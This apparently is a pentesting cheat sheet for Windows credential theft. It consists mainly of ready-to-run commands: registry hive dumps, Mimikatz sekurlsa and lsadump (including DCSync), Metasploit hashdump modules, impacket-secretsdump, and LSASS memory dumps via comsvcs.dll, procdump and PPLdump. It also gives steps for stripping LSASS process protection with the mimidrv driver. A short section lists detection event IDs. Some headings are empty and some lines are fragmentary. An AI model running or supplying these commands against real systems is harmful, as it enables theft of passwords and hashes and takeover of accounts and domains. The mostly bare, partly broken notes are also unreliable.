Password mining

Get the NetNTLMv1 hash of the current user:

Without admin rights

With admin rights

Windows Credential Management

Thread/Process → Token → Logon Session → Auth Package → Credential (optional)
Network logon (type 3): the client proves it has the credentials but does not send them to the server (creds are not in memory)
Non-network logon (Interactive/NetworkCleartext/…): the client sends credentials to the service (creds are in lsass.exe)


reg.exe save hklm\sam c:\temp\
reg.exe save hklm\security c:\temp\
reg.exe save hklm\system c:\temp\
load kiwi
use post/windows/gather/smart_hashdump
impacket-secretsdump <admin>@<ip> -hashes <lm:nt>


lsadump::cache /system:system /sam:sam /security:security
run post/windows/gather/cachedump


LSASS is protected
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL 
Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name "RunAsPPL" 
Using Mimikatz

If LSASS is protected (Full WinTcb), try to add or remove process protection using Mimidrv. It requires SeLoadDriverPrivilege.

It starts a service using advapi32!ServiceCreate granting access to the service to Everyone group.

Windows Event ID 7045 & 4697 - Service Creation
- Service Name: “mimikatz driver (mimidrv)”
- Service File Name: *\mimidrv.sys
- Service Type: kernel mode driver (0x1)
- Service Start Type: auto start (2)

Event ID 4697 contains information about the account that loaded the driver. Audit Security System Extension must be configured via Group Policy for this event to be generated.

Sysmon Event ID 11 - File Creation
- TargetFilename: *\mimidrv.sys
Sysmon Event ID 6 - Driver Loaded
- ImageLoaded: *\mimidrv.sys
- SignatureStatus: Expired

!processProtect /process:mimikatz.exe

Cleaning steps

!processprotect /process:lsass.exe
PPLdump64.exe -v lsass lass.dmp
LSASS is not protected
rundll32.exe comsvcs.dll, #24 "<PID> my.dmp full"
sqldumper.exe <PID> 0 0x0110

Remove banners before compilation:
By default: C:\Windows\temp\dumpert.dmp

rundll32.exe dumpert.dll,Dump
procdump.exe -accepteula -ma lsass.exe dump.dmp
sekurlsa::minidump dump.dmp (offline)
sekurlsa::logonPasswords full (offline)
sekurlsa::logonPasswords full
lsadump::lsa /inject
lsadump::lsa /patch (/id:<account_id>)
lsadump::lsa /patch (/name:<account_name>)
use post/windows/gather/smart_hashdump
load kiwi
wce32.exe [-w]
fgdump [-u <user> -p <password> -h <ip>]


lsadump::dcsync /user:<domain\user> /domain:<fqdn_domain> [/dc:<dc_name>]